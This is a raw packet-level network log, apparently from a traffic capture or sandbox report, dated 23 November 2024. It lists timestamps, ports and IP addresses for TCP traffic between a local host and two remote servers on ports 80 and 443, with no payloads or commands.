                                                                                                                                                                          Nov 23, 2024 19:01:40.484030008 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.484873056 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.484890938 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.484937906 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.484993935 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.485707998 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.485737085 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.485753059 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.485754013 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.485769033 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.486459970 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.486506939 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.486530066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.486543894 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.486582041 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.487308025 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.487597942 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.487646103 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.487653017 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.487662077 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.487696886 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.488437891 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.488497019 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.488512039 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.488543987 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.489438057 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.489486933 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.489502907 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.489541054 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.489566088 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.489976883 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.490242004 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.490282059 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.490297079 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.490350008 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.491008997 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.491050959 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.491065979 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.491107941 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.491866112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.491884947 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.491899967 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.491934061 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.492885113 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.492933989 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.492949009 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.492990017 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.493016005 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.493643999 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.493710995 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.493726969 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.493757963 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.501928091 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.521588087 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.536333084 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.536353111 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.536813021 CET49747443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.536818027 CET4434974713.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.657855034 CET4434974813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.663250923 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.663275003 CET4434974813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.665766954 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.665795088 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.665811062 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.665849924 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.666199923 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.666254997 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.666269064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.666294098 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.666327000 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.667062998 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.667253971 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.667298079 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.667304993 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.667336941 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.667377949 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.668061018 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.668126106 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.668139935 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.668178082 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.668937922 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.668993950 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.669009924 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.669035912 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.669049978 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.669780970 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.669831991 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.669846058 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.669883013 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.670645952 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.670695066 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.670716047 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.670736074 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.670748949 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.671080112 CET49748443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.671083927 CET4434974813.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.671475887 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.671586990 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.671602011 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.671642065 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.672393084 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.672452927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.672467947 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.672491074 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.672508001 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.673185110 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.673243999 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.673260927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.673283100 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.674055099 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.674110889 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.674127102 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.674151897 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.674174070 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.674899101 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.674963951 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.674979925 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.675004005 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.675767899 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.675823927 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.675841093 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.675865889 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.675888062 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.676594019 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.676655054 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.676670074 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.676693916 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.677478075 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.677526951 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.677541971 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.677565098 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.677597046 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.678320885 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.678368092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.678385019 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.678409100 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.679177999 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.679248095 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.679265022 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.679291964 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.679322004 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.680008888 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.680049896 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.680067062 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.680092096 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.681015968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.681032896 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.681072950 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.681188107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.681771040 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.681785107 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.681801081 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.681818008 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.681832075 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.682574034 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.682595968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.682622910 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.682637930 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.682662964 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.682687998 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.683427095 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.683478117 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.683492899 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.683520079 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.683784962 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.684338093 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.684354067 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.684370041 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.684375048 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.684412956 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.685163975 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.685225010 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.685240984 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.685271025 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.686155081 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.686274052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.686290026 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.686315060 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.686346054 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.686837912 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.686901093 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.686917067 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.686938047 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.687824011 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.687868118 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.687884092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.687907934 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.687936068 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.688568115 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.688847065 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.688889027 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.688905001 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.688920975 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.688954115 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.689681053 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.689726114 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.689743042 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.689785004 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.690556049 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.690582991 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.690598011 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.690620899 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.690639019 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.691431999 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.691450119 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.691466093 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.691493034 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.692248106 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.692287922 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.692316055 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.692331076 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.692372084 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.693162918 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.693211079 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.693233013 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.693248034 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.693964005 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.694036961 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.694051981 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.694061041 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.694823980 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.694839001 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.694854975 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.694859982 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.694891930 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.859111071 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.859184027 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.859236956 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.861915112 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.861951113 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.861972094 CET49746443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.861980915 CET4434974613.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.867140055 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.867199898 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.867217064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.867237091 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.867500067 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.867536068 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.867593050 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.867608070 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.867640018 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.868336916 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.868536949 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.868571043 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.868613958 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.868628979 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.868660927 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.869401932 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.869417906 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.869452953 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.869512081 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.869545937 CET49749443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.869612932 CET4434974913.107.246.63192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.869683027 CET49749443192.168.2.513.107.246.63
                                                                                                                                                                          Nov 23, 2024 19:01:40.870263100 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.870301962 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.870301962 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.870316982 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.870348930 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.871109962 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.871160984 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.871181965 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.871192932 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.871953011 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.871977091 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.871994019 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.871994019 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.872024059 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.872812986 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.872853994 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.872869968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.872889996 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.873641968 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.873681068 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.873697996 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.873713970 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.873745918 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.874527931 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.874576092 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.874591112 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.874609947 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.875354052 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.875392914 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.875406981 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.875423908 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.875457048 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.876211882 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.876259089 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.876276970 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.876293898 CET4973880192.168.2.5185.215.113.16
                                                                                                                                                                          Nov 23, 2024 19:01:40.877077103 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.877104044 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.877119064 CET8049738185.215.113.16192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:40.877120018 CET4973880192.168.2.5185.215.113.16
